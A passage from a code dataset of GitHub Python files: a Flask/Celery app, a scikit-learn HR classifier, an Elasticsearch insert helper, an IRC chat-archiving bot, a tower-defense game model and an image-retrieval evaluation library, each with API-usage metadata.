"torch.cuda.is_available", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 246, "usage_type": "attribute"}, {"api_name": "models.Embedder", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 255, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 258, "usage_type": "call"}, {"api_name": "utils.permuter", "line_number": 264, "usage_type": 
"call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "utils.permuter", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.incr_ratserize", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 282, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 283, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 284, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 286, "usage_type": "attribute"}, {"api_name": "torch.softmax", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 294, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 295, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 332, "usage_type": "call"}, {"api_name": "utils.listofindex", "line_number": 345, "usage_type": "name"}, {"api_name": "utils.listofindex", "line_number": 346, "usage_type": "name"}]}
+{"seq_id": "706852684", "text": "\"\"\"app.py\"\"\"\nimport os\nimport sys\nimport logging\nfrom celery import Celery\nfrom flask import Flask\nfrom flask_mongoengine import MongoEngine\n\ndef make_celery(app):\n celery = Celery(app.import_name, backend=app.config['CELERY_BACKEND'],\n broker=app.config['CELERY_BROKER_URL'])\n celery.conf.update(app.config)\n TaskBase = celery.Task\n class ContextTask(TaskBase):\n abstract = True\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n celery.Task = ContextTask\n return celery\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = MongoEngine(app)\ncelery = make_celery(app)\n\n\nlogging.basicConfig(\n stream=app.config['LOGSTREAM'], level=app.config['LOGLEVEL'])\n\nTMP_DIR = os.environ.get('TMP_DIR', os.path.join('/tmp', 'guruserver'))\n\nfrom .api import api\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "uw-hai/guru-server", "sub_path": "guruserver/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "celery.conf.update", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 12, "usage_type": "attribute"}, {"api_name": "celery.Task", "line_number": 13, "usage_type": "attribute"}, {"api_name": "celery.Task", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask_mongoengine.MongoEngine", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 31, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "42759100719", "text": "from sklearn.preprocessing import LabelEncoder\nfrom sklearn.neural_network import MLPClassifier\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n\ndef analyze(data, type):\n print(data.shape)\n print(data.info())\n print(data.describe())\n print(data.head())\n print(data[type].value_counts())\n\n\ndef analyze_good_employees(data):\n averages = data.mean()\n average_last_evaluation = averages['last_evaluation']\n average_project = averages['number_project']\n average_montly_hours = averages['average_monthly_hours']\n average_time_spend = averages['time_spend_company']\n average_salary = averages['salary']\n\n good_employees = data[data['last_evaluation'] > average_last_evaluation]\n good_employees = good_employees[good_employees['number_project'] > average_project]\n good_employees = good_employees[good_employees['average_monthly_hours'] > average_montly_hours]\n good_employees = good_employees[good_employees['time_spend_company'] > average_time_spend]\n good_employees = good_employees[good_employees['salary'] > average_salary]\n\n sns.set()\n plt.figure(figsize=(15, 8))\n plt.hist(data['left'])\n print(good_employees.shape)\n sns.heatmap(good_employees.corr(), vmax=0.5, cmap=\"PiYG\")\n plt.title('Correlation matrix')\n plt.show()\n\n\ndef label_encode(data, col):\n # Transforme un type catégorie en entier\n le = LabelEncoder()\n # On récupère tous les noms de catégories possibles\n unique_values = list(data[col].unique())\n le_fitted = le.fit(unique_values)\n # On liste l'ensemble des valeurs\n values = list(data[col].values)\n # On transforme les catégories en entier\n values_transformed = le.transform(values)\n # On fait le remplacement de la colonne dans le dataframe d'origine\n data[col] = values_transformed\n #print(data)\n\n\ndef split_data(data, y):\n train, test = train_test_split(data, test_size=0.3)\n x_train = train\n y_train = train[y]\n del x_train[y]\n\n x_test = test\n y_test = test[y]\n del x_test[y]\n\n return x_train, y_train, x_test, y_test\n\n\ndef create_model(classifier, x, y):\n classifier.fit(x, y)\n return classifier\n\n\ndef display_score(classifier, x_train, y_train, x_test, y_test):\n print(\"Train score: {}, Test score {}\".format(classifier.score(x_train, y_train), classifier.score(x_test, y_test)))\n y_pred = classifier.predict(x_test)\n print(confusion_matrix(y_test, y_pred))\n\n\nif __name__ == '__main__':\n data = pd.read_csv('human_resources.csv')\n #analyze(data, 'left')\n label_encode(data, 'category')\n label_encode(data, 'salary')\n analyze_good_employees(data)\n x_train, y_train, x_test, y_test = split_data(data, 'left')\n\n classifier = create_model(MLPClassifier(), x_train, y_train)\n display_score(classifier, x_train, y_train, x_test, y_test)\n\n\n", "repo_name": "Weamix/ApprentissageArtificiel", "sub_path": "TP5-neural-network/neural_network.py", "file_name": "neural_network.py", "file_ext": "py", "file_size_in_byte": 2950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "seaborn.set", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 34, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "18405366052", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n#Edited By Sky 2017-07-24\n\n\nimport pcPython.pcGroup.util.requestUtil as requestUtil\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\nclass insertUtil():\n '''\n esServer : elasticsearch的服务端口,eg:192.168.12.81:9200\n index:索引名字\n type:类型\n data:json字符串数据\n '''\n def insertSingle(self , esServer , index , type , data , headers = None):\n url = \"http://%s/%s/%s\" % (esServer , index , type)\n if headers == None:\n headers = {'User-Agent':'PcGroup Util Client',\"Content-Type\" : \"application/json; charset=UTF-8\"}\n requestUtil.post( url , data , headers)\n else:\n requestUtil.post( url , data , headers )\n\n '''\n esServer : elasticsearch的服务端口,eg:192.168.12.81:9200\n index:索引名字\n type:类型\n data:列表中包含字典:[{\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}]\n data = []\n dataDict = {\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}\n data.append(dataDict)\n data.append(dataDict)\n '''\n def insertBluk(self , esServer , index , type , data):\n es = Elasticsearch( esServer )\n if isinstance(data,dict):\n actions = [{'_op_type': 'index', '_index': index, '_type': type, '_source': d} for d in data.itervalues()]\n else:\n actions = [{'_op_type': 'index','_index' : index ,'_type' : type , '_source':d} for d in data]\n bulk(es , actions)\n\n\n def setMapping(self,esServer, index_name, doc_type=\"logs\", field_type=((\"esDate\",\"date\"),)):\n es = Elasticsearch(esServer)\n if not es.indices.exists(index=index_name):\n innerdict={field[0]:{\"type\":field[1],\n } for field in field_type}\n\n my_mapping = {\n \"%s\"%(doc_type): {\n \"properties\":\n innerdict\n\n }\n }\n\n create_index = es.indices.create(index=index_name)\n mapping_index = es.indices.put_mapping(index=index_name, doc_type=doc_type,\n body=my_mapping)\n\n\n\n\nif __name__== \"__main__\":\n # inserutil = insertUtil()\n data = []\n dataDict = {\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}\n data.append(dataDict)\n data.append(dataDict)\n # inserutil.insertBluk(\"192.168.12.81:9200\" , \"test5\" , \"logs\" , data)\n inserutil = insertUtil()\n inserutil.setMapping(\"192.168.12.81:9200\",\"testmap\",field_type=((\"ip\",\"keyword\"),(\"time\",\"date\"),(\"name\",\"text\")))\n inserutil.insertBluk(\"192.168.12.81:9200\", \"testmap\", \"logs\", data)", "repo_name": "workman-Lu/IPAM_for_pc", "sub_path": "pcGroup/elasticSearch/insertUtil.py", "file_name": "insertUtil.py", "file_ext": "py", "file_size_in_byte": 2676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pcPython.pcGroup.util.requestUtil.post", "line_number": 21, "usage_type": "call"}, {"api_name": "pcPython.pcGroup.util.requestUtil", "line_number": 21, "usage_type": "name"}, {"api_name": "pcPython.pcGroup.util.requestUtil.post", "line_number": 23, "usage_type": "call"}, {"api_name": "pcPython.pcGroup.util.requestUtil", "line_number": 23, "usage_type": "name"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 36, "usage_type": "call"}, {"api_name": "elasticsearch.helpers.bulk", "line_number": 41, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "27758783777", "text": "import copy\nimport utils.base_utils as base_utils\n\n\nclass BattleField:\n '''\n Class of the game environment\n '''\n '''\n Класс игрового окружения\n '''\n\n base_hp = base_utils.Bar()\n\n def __init__(self, max_base_hp, tower_space, waves, enemy_path):\n '''\n Init method of the game environment\n :param max_base_hp: max health points of the base\n :param tower_space: list with places available to place towers\n :param waves: list with enemy waves\n :param enemy_path: list with enemy path\n '''\n '''\n Метод инициализации игрового окружения\n :param max_base_hp: максимальное кол-во здоровья базы\n :param tower_space: список с местами доступными для застройки башнями\n :param waves: список с волнами врагов\n :param enemy_path: список с путем врагов\n '''\n\n self.base_hp = (0, max_base_hp, max_base_hp)\n self.money = 2000\n\n self.tower_space = tower_space\n self.enemy_path = enemy_path\n\n self.enemies = []\n self.towers = []\n self.enemy_generator = EnemyGenerator(waves, enemy_path, self)\n\n self.fresh_objs = []\n self.del_objs = []\n\n def get_enemies(self):\n '''\n Method that returns the list with all enemies\n '''\n '''\n Метод, возвращающий списко со всеми врагами\n '''\n\n return self.enemies\n\n def get_towers(self):\n '''\n Method that returns the list with all towers\n '''\n '''\n Метод, возвращающий списко со всеми башнями\n '''\n\n return self.towers\n\n def get_wave_data(self):\n '''\n Method that wraps the enemy generator get_wave_data\n '''\n '''\n Метод-обертка для метода get_wave_data генератора врагов\n '''\n\n return self.enemy_generator.get_wave_data()\n\n def income(self, money):\n '''\n Method that receive income\n '''\n '''\n Метод, примающий доход\n '''\n\n self.money += money\n\n def hit_base(self, dmg):\n '''\n Method that registers damage to the base\n :param dmg: dealt damage\n '''\n '''\n Метод, регистрирующий урон по базе\n :param dmg: нанесенный урон\n '''\n\n self.base_hp -= dmg\n\n def can_buy(self, tower_type):\n '''\n Method that checks the ability to but the tower\n of given type\n :param tower_type: type of tower to check for\n '''\n '''\n Метод, проверяющий возможность покупки данного типа\n башен\n :param tower_type: тип башен, для которого нужно проверить\n возможность покупки\n '''\n\n return tower_type.price <= self.money\n\n def get_free_space(self, tower_type):\n '''\n Method that returns available space to place tower of the\n given type\n :param tower_type: type of the tower to check for\n '''\n '''\n Метод, возвращающий возможные места для застройки данным типом\n башен\n :param tower_type: тип башен, для которого нужно проверить\n возможность застройки\n '''\n\n if tower_type.price <= self.money:\n return copy.deepcopy(self.tower_space)\n else:\n return list()\n\n def buy_tower(self, tower_pos, tower_type):\n '''\n Method that buys the tower of the given type and place\n it on given coords\n :param tower_pos: position to place tower on\n :param tower_type: type of the bought tower\n '''\n '''\n Метод, покупающий башню данного типа и устанавливающий\n ее на данную позицию\n :param tower_pos: позиция для установки башни\n :param tower_type: тип, купленной башни\n '''\n\n if tower_type.price <= self.money:\n new_tower = tower_type.get_tower(self, tower_pos)\n\n self.towers.append(new_tower)\n self.fresh_objs.append(new_tower)\n\n self.tower_space.remove(tower_pos)\n self.money -= tower_type.price\n return True\n else:\n return False\n\n def get_occupied_space(self):\n '''\n Method that returns list of 
place occupied by towers\n '''\n '''\n Метод, возращающий список с местми, занятыми башнями\n '''\n\n occupied_space = [tower.pos for tower in self.towers]\n return copy.deepcopy(occupied_space)\n\n def sell_tower(self, tower_pos):\n '''\n Method that sells the tower on the given position\n :tower_pos: position of tower to sell\n '''\n '''\n Метод, продающий башню на данной позиции\n :tower_pos: позиция башни, которую нужно продать\n '''\n\n for tower in self.towers:\n if tower.pos == tower_pos:\n self.towers.remove(tower)\n self.del_objs.append(tower)\n self.money += tower.sell()\n self.tower_space.append(tower_pos)\n\n def check_end(self):\n '''\n Method that checks for gameover\n '''\n '''\n Метод, проверяющий закончалась ли игра\n '''\n\n wave_flag = len(self.enemy_generator.waves) == 0\n enemy_flag = len(self.enemies) == 0\n health_flag = self.base_hp == 0\n\n return (wave_flag and enemy_flag) or health_flag\n\n def update(self, dt):\n '''\n Method that updates the game environment\n :param dt: amount of passed time\n '''\n '''\n Метод, обновляющий игровое окружение\n :param dt: кол-во прошедшего времени\n '''\n\n for enemy in self.enemies:\n enemy.run(dt)\n\n for tower in self.towers:\n tower.run(dt)\n\n dead_enemies = []\n for enemy in self.enemies:\n if not enemy.is_alive():\n dead_enemies.append(enemy)\n\n for enemy in dead_enemies:\n self.del_objs.append(enemy)\n self.enemies.remove(enemy)\n\n self.enemy_generator.run(dt)\n self.enemy_generator.generate_enemy()\n return not self.check_end()\n\n\nclass EnemyGenerator:\n '''\n Class of enemy generator\n '''\n '''\n Класс генератора врагов\n '''\n\n def __init__(self, waves, enemy_path, battle_field):\n '''\n Init method of enemy generator\n :param waves: list with enemy waves\n :param enemy_path: list with enemy path\n :param battle_fied: link to the current game environment\n '''\n '''\n Метод инициализации генератора врагов\n :param waves: список с волнами врагов\n :param enemy_path: список с путем врагов\n :param battle_field: ссылка на текущее игровое окружение\n '''\n\n self.waves = waves\n self.enemy_path = enemy_path\n self.battle_field = battle_field\n\n self.total_waves_number = len(self.waves)\n self.enemy_timer = base_utils.Timer(5)\n self.wave_timer = base_utils.Timer(10)\n\n def generate_enemy(self):\n '''\n Method that generates new enemy\n '''\n '''\n Метод, создающий нового врага\n '''\n\n if self.wave_timer.is_ringing():\n if self.enemy_timer.is_ringing():\n if len(self.waves) > 0:\n enemy_factory = self.waves[0].pop(0)\n new_enemy = enemy_factory.get_enemy(self.battle_field,\n self.enemy_path)\n self.battle_field.enemies.append(new_enemy)\n self.battle_field.fresh_objs.append(new_enemy)\n self.enemy_timer.reset()\n if len(self.waves[0]) == 0:\n self.waves.pop(0)\n self.wave_timer.reset()\n\n def run(self, dt):\n '''\n Method that describes enemy generator default behaviour\n :param dt: amount of passed time\n '''\n '''\n Метод, описывающий дефолтное поведение генератора врагов\n :param dt: кол-во прошедшего времени\n '''\n\n if self.wave_timer.is_ringing():\n self.enemy_timer.update(dt)\n else:\n self.wave_timer.update(dt)\n\n return len(self.waves) > 0\n\n def get_wave_data(self):\n '''\n Method that returns the wave data\n (current wave number, total waves number)\n '''\n '''\n Метод, возвращающий кортеж с номером, текущий волны,\n общим кол-вом волн\n '''\n\n curr_wave_number = self.total_waves_number - len(self.waves) + 1\n curr_wave_number = min(curr_wave_number, self.total_waves_number)\n return 
(curr_wave_number, self.total_waves_number)\n", "repo_name": "SenpaiKirigaia/AAA-Tower-defense", "sub_path": "model/battle_field.py", "file_name": "battle_field.py", "file_ext": "py", "file_size_in_byte": 9885, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.base_utils.Bar", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 13, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 125, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 164, "usage_type": "call"}, {"api_name": "utils.base_utils.Timer", "line_number": 254, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.base_utils.Timer", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 255, "usage_type": "name"}]}
+{"seq_id": "14025096488", "text": "#!/usr/bin/python3\nimport time\nimport json\nimport threading\nimport os\nfrom ircConnect import *\nfrom config import *\n\n#ESTABLISH CONNECTION TO IRC:\nirc = IRC(server, channel, botnick)\nirc.connect()\n\n#DEFINE TEMPORARY STORAGE OF MESSAGE CHAINS:\nchains = {}\n\n#RETRIEVE CURRENT JSON DATA:\ndata = {}\nwith open('chainlog.json', 'r') as jsonFile:\n data = json.load(jsonFile)\nnext_id = data[\"next_id\"]\n\n#MESSAGE CHAIN:\nclass Chain:\n def __init__(self, duration):\n self.start_time = time.time()\n self.duration = duration\n self.messages = []\n def add_message(self, name, message):\n self.messages.append(name + ': ' + message)\n def check_status(self):\n if time.time() - self.start_time > self.duration:\n return True\n else:\n return False\n\n#TIMER FOR UPDATING ARCHIVE:\nclass timerInstance (threading.Thread):\n def __init__(self, delay, next_id):\n threading.Thread.__init__(self)\n self.delay = delay\n self.next_id = next_id\n def run(self):\n while 1:\n time.sleep(self.delay)\n self.next_id = update_archive(self.next_id)\n\n#FUNCTION TO UPDATE ARCHIVE:\ndef update_archive(next_id):\n print('Archiving chains!')\n removeKeys = []\n for c in chains:\n if chains[c].check_status() == True:\n removeKeys.append(c)\n if not removeKeys:\n print('Done Archiving - no chains were archived')\n else:\n numArchived = len(removeKeys)\n with open('chainlog.json', 'w') as jsonFile:\n for k in removeKeys:\n data[\"chains\"].append({ \"id\":next_id, \"messages\":chains[k].messages })\n next_id += 1\n data[\"next_id\"] = next_id\n del chains[k]\n json.dump(data, jsonFile, indent = 4)\n print('Done Archiving -', numArchived, 'chains archived')\n return next_id\n\n#INSTANCE TIMER\ntimer = timerInstance(archive_check_delay, next_id)\ntimer.start()\n\n#main loop\nwhile 1:\n name, message = irc.rec_message()\n #message from troy or eby -- add message to all current chains\n if name in helpers:\n if all(bword not in message for bword in blocklist):\n print('message from helpers! adding to all chains.')\n for c in chains:\n c.add_message(name, message)\n #current chain exists from given user -- add message to chain\n elif name in chains:\n if all(bword not in message for bword in blocklist):\n print('new comment from origin of a chain, adding message.')\n chains[name].add_message(name, message)\n #detect new question, if reference to keywords\n else:\n if any(kword in message for kword in keywords):\n if all(bword not in message for bword in blocklist):\n if all(user != name for user in blockusers):\n print('new chain initialized.')\n chains[name] = Chain(chain_duration)\n chains[name].add_message(name, message)\n", "repo_name": "brainjos/skoop-ircScraper", "sub_path": "skoop.py", "file_name": "skoop.py", "file_ext": "py", "file_size_in_byte": 3006, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 37, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 39, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 39, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "9233453217", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Evaluation library\n\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport json\nfrom collections import Counter\nfrom operator import itemgetter\nimport cv2\nimport numpy as np\nos.environ['GLOG_minloglevel'] = '2'\nfrom tqdm import tqdm\n\n\nclass ImageHelper(object):\n def __init__(self, S, L, means):\n self.S = S\n self.L = L\n self.means = means\n\n def prepare_image_and_grid_regions(self, fname, roi=None):\n \"\"\"\n\n :param fname: str\n :param roi: np.ndarray\n :return:\n \"\"\"\n # Extract image, resize at desired size, and extract roi region if\n # available. Then compute the rmac grid in the net format: ID X Y W H\n I, im_resized = self.load_and_prepare_image(fname, roi)\n if self.L == 0:\n # Encode query in mac format instead of rmac, so only one region\n # Regions are in ID X Y W H format\n R = np.zeros((1, 5), dtype=np.float32)\n R[0, 3] = im_resized.shape[1] - 1\n R[0, 4] = im_resized.shape[0] - 1\n else:\n # Get the region coordinates and feed them to the network.\n all_regions = []\n all_regions.append(self.get_rmac_region_coordinates(im_resized.shape[0], im_resized.shape[1], self.L))\n R = self.pack_regions_for_network(all_regions)\n return I, R\n\n @staticmethod\n def get_rmac_features(I, R, net):\n \"\"\"\n\n :param I: : np.ndarray\n :param R: : np.ndarray\n :param net:\n :return:\n \"\"\"\n net.blobs['data'].reshape(I.shape[0], 3, int(I.shape[2]), int(I.shape[3]))\n net.blobs['data'].data[:] = I\n net.blobs['rois'].reshape(R.shape[0], R.shape[1])\n net.blobs['rois'].data[:] = R.astype(np.float32)\n net.forward(end='rmac/normalized')\n return np.squeeze(net.blobs['rmac/normalized'].data)\n\n def load_and_prepare_image(self, fname, roi=None):\n \"\"\"\n\n :param fname: : str\n :param roi:\n :return:\n \"\"\"\n # Read image, get aspect ratio, and resize such as the largest side equals S\n im = cv2.imread(fname)\n im_size_hw = np.array(im.shape[0:2])\n ratio = float(self.S)/np.max(im_size_hw)\n new_size = tuple(np.round(im_size_hw * ratio).astype(np.int32))\n im_resized = cv2.resize(im, (new_size[1], new_size[0]))\n # If there is a roi, adapt the roi to the new size and crop. Do not rescale\n # the image once again\n if roi is not None:\n roi = np.round(roi * ratio).astype(np.int32)\n im_resized = im_resized[roi[1]:roi[3], roi[0]:roi[2], :]\n # Transpose for network and subtract mean\n I = im_resized.transpose(2, 0, 1) - self.means\n return I, im_resized\n\n @staticmethod\n def pack_regions_for_network(all_regions):\n n_regs = np.sum([len(e) for e in all_regions])\n R = np.zeros((n_regs, 5), dtype=np.float32)\n cnt = 0\n # There should be a check of overflow...\n for i, r in enumerate(all_regions):\n try:\n R[cnt:cnt + r.shape[0], 0] = i\n R[cnt:cnt + r.shape[0], 1:] = r\n cnt += r.shape[0]\n except:\n continue\n assert cnt == n_regs\n R = R[:n_regs]\n # regs where in xywh format. R is in xyxy format, where the last coordinate is included. 
Therefore...\n R[:n_regs, 3] = R[:n_regs, 1] + R[:n_regs, 3] - 1\n R[:n_regs, 4] = R[:n_regs, 2] + R[:n_regs, 4] - 1\n return R\n\n @staticmethod\n def get_rmac_region_coordinates(H, W, L):\n # Almost verbatim from Tolias et al Matlab implementation.\n # Could be heavily pythonized, but really not worth it...\n # Desired overlap of neighboring regions\n ovr = 0.4\n # Possible regions for the long dimension\n steps = np.array((2, 3, 4, 5, 6, 7), dtype=np.float32)\n w = np.minimum(H, W)\n\n b = (np.maximum(H, W) - w) / (steps - 1)\n # steps(idx) regions for long dimension. The +1 comes from Matlab\n # 1-indexing...\n idx = np.argmin(np.abs(((w**2 - w * b) / w**2) - ovr)) + 1\n\n # Region overplus per dimension\n Wd = 0\n Hd = 0\n if H < W:\n Wd = idx\n elif H > W:\n Hd = idx\n\n regions_xywh = []\n for l in range(1, L+1):\n wl = np.floor(2 * w / (l + 1))\n wl2 = np.floor(wl / 2 - 1)\n # Center coordinates\n if l + Wd - 1 > 0:\n b = (W - wl) / (l + Wd - 1)\n else:\n b = 0\n cen_w = np.floor(wl2 + b * np.arange(l - 1 + Wd + 1)) - wl2\n # Center coordinates\n if l + Hd - 1 > 0:\n b = (H - wl) / (l + Hd - 1)\n else:\n b = 0\n cen_h = np.floor(wl2 + b * np.arange(l - 1 + Hd + 1)) - wl2\n\n for i in cen_h:\n for j in cen_w:\n regions_xywh.append([j, i, wl, wl])\n\n # Round the regions. Careful with the borders!\n for region in regions_xywh:\n for j in range(4):\n region[j] = int(round(region[j]))\n if region[0] + region[2] > W:\n region[0] -= ((region[0] + region[2]) - W)\n if region[1] + region[3] > H:\n region[1] -= ((region[1] + region[3]) - H)\n return np.array(regions_xywh).astype(np.float32)\n\n\nclass Dataset(object):\n def __init__(self, img_root, two_stage_num_clusters, filename_poses):\n \"\"\"\n\n :param img_root: str\n :param two_stage_num_clusters: bool\n :param filename_poses: str\n \"\"\"\n self.img_root = img_root\n self.two_stage_num_clusters = two_stage_num_clusters\n self.image_data = self.load_image_data(filename_poses)\n self.size_dataset = len(self.image_data)\n self.db_indices = None\n self.all_query_info = None\n self.query_indices = None\n self.num_rooms = -1\n # Mapping from room string to room ID (used in custom aggregation mode and for ground truth in pano retrieval)\n self.room_string_to_id = None\n # Ground truth info\n self.query_id_to_positive_classes = None\n self.query_id_to_junk_classes = None\n # Mapping from image ID to room or panorama ID\n self.image_info = {}\n # Mapping from cluster ID to room ID / panorama ID / view IDs\n self.cluster_info = None\n # Random offset for intra-panorama aggregation\n self.pano_rand_offset = None\n\n def load_image_data(self, filename_poses):\n \"\"\"\n\n :param filename_poses: str\n :return:\n \"\"\"\n # Load image data from JSON file of full dataset and sort by increasing ID value\n #filename_poses = 'view_poses_filtered.json'\n assert os.path.exists(os.path.join(self.img_root, filename_poses)), \\\n 'The file %s was not found in %s' % (filename_poses, self.img_root)\n json_data = json.load(open(os.path.join(self.img_root, filename_poses)))\n image_data = sorted(json_data['images'], key=itemgetter('id'))\n assert [image['id'] for image in image_data] == range(len(image_data)), \\\n 'Non consecutive image IDs'\n return image_data\n\n def set_query_info(self, query_file):\n \"\"\"\n\n :param query_file: str\n :return:\n \"\"\"\n if query_file:\n json_data = json.load(open(query_file))\n for query in json_data['query_views']:\n assert query['filename'] == self.image_data[query['id']]['filename'], \\\n 'ID mismatch between 
dataset file and query file'\n self.all_query_info = sorted(json_data['query_views'], key=itemgetter('id'))\n else:\n self.all_query_info = []\n\n def set_db_info(self, db_file):\n \"\"\"\n\n :param db_file: : str\n :return:\n \"\"\"\n if db_file:\n json_data = json.load(open(db_file))\n for db_entry in json_data['db_views']:\n assert db_entry['filename'] == self.image_data[db_entry['id']]['filename'], \\\n 'ID mismatch between dataset file and database file'\n self.db_indices = np.sort([db_entry['id'] for db_entry in json_data['db_views']])\n else:\n self.db_indices = np.arange(len(self.image_data))\n\n def set_retrieval_info(self, query_file, db_file):\n \"\"\"\n\n :param query_file: str\n :param db_file: str\n :return:\n \"\"\"\n # Get query IDs from the query JSON file\n self.set_query_info(query_file)\n # Get database IDs from the database JSON file\n self.set_db_info(db_file)\n # Check that there is no overlap\n all_query_indices = [query['id'] for query in self.all_query_info]\n assert len(set(all_query_indices).intersection(set(self.db_indices))) == 0, \\\n 'Intersection between query and db images is not empty'\n\n # Get room IDs\n rooms = [image['room'] for image in self.image_data]\n room_id_to_string, self.image_info['room'] = np.unique(rooms, return_inverse=True)\n self.room_string_to_id = {}\n for room_id, room in enumerate(room_id_to_string):\n self.room_string_to_id[room] = room_id\n self.num_rooms = len(room_id_to_string)\n\n # Get panorama IDs\n panos = [image['source_pano_filename'] for image in self.image_data]\n _, self.image_info['pano'] = np.unique(panos, return_inverse=True)\n\n # This function takes as input the original view-level features and returns the aggregated features. For each\n # aggregated feature (cluster), it also populates the cluster information into the list self.cluster_info.\n def aggregate_features(self, features, feat_aggregation_stages, pooling, cluster_files, randomize=False):\n features_stages = []\n cluster_info_stages = []\n num_custom_stages = feat_aggregation_stages.count('custom')\n assert num_custom_stages == len(cluster_files) or num_custom_stages == 0, \\\n 'The number of cluster files should match the number of stages with custom aggregation'\n custom_idx = 0\n for feat_aggregation in feat_aggregation_stages:\n if feat_aggregation == 'custom':\n cluster_info = self.compute_clusters(feat_aggregation, cluster_files[custom_idx], randomize)\n custom_idx += 1\n else:\n cluster_info = self.compute_clusters(feat_aggregation, None, randomize)\n features_stage, cluster_info_nonempty = self.aggregate_by_cluster(features, cluster_info, pooling)\n # Remove empty clusters\n cluster_info_stages.append(cluster_info_nonempty)\n features_stages.append(features_stage)\n self.cluster_info = 